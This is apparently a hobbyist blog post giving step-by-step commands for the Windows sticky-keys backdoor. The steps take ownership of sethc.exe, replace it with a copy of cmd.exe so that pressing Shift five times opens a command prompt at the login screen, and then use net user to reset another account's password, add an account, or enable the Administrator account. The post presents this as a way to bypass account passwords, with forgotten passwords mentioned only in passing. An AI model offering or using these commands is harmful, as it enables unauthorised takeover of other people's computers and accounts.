Before learning this hack you have to read the previous "level 1" hacking post I've written, to know about the "net user" command in windows. To see the post
click here .If you know that then Fuck it..
This hack opens a
backdoor in your windows, using which you can log on anytime replacing/ignoring the current user account password. But like last time, You have to get physical access (only once if you pull it off) to the account. You can use it to login if you forgot your password.
How to:
1. Open '
cmd.exe' in administrator mode. (ignore the 's)
2. type '
takeown /f sethc.exe' (this command will take ownership of the sethc.exe file)
3. type '
icacls "c:\windows\system32\sethc.exe" /grant administrators:F'
4. type '
ren sethc.exe sethc_old.exe' (this will rename the sticky keys program)
-----> if you get a "access denied" notification you need to manually get the ownership. -----> to manually get the ownership go to the file (C: -> windows -> system32 -> sethc.exe -> right click -> properties -> click on the security tab -> edit -> click on user and click on the full control checkbox ) -> apply -> ok
5. type '
copy cmd.exe sethc.exe' (this will copy paste the cmd.exe file and name it sethc.exe)
Its done! now if you press "shift key" 5 time you will see the command prompt opening! this is the backdoor!
Now you can log in to windows by either replacing a password of an account or creating another account or logging in to the administrator account using this command window. select any of the processes below:
1) '
net user user_acc new_password' to change the password of the user_acc to new_password.
(ie: 'net user john abc123' ; if you wanna get into the account name john!)
2) type '
net user new_user /add' to add an account and log in there.
3) type '
net user administrator /active:yes' to enable the administrator account and logging in to it!
(you might need to restart)
<<
Share On Facebook >>
If you like my posts Subscribe by clicking "subscribe" at the right side! Leave a comment if you have any queries!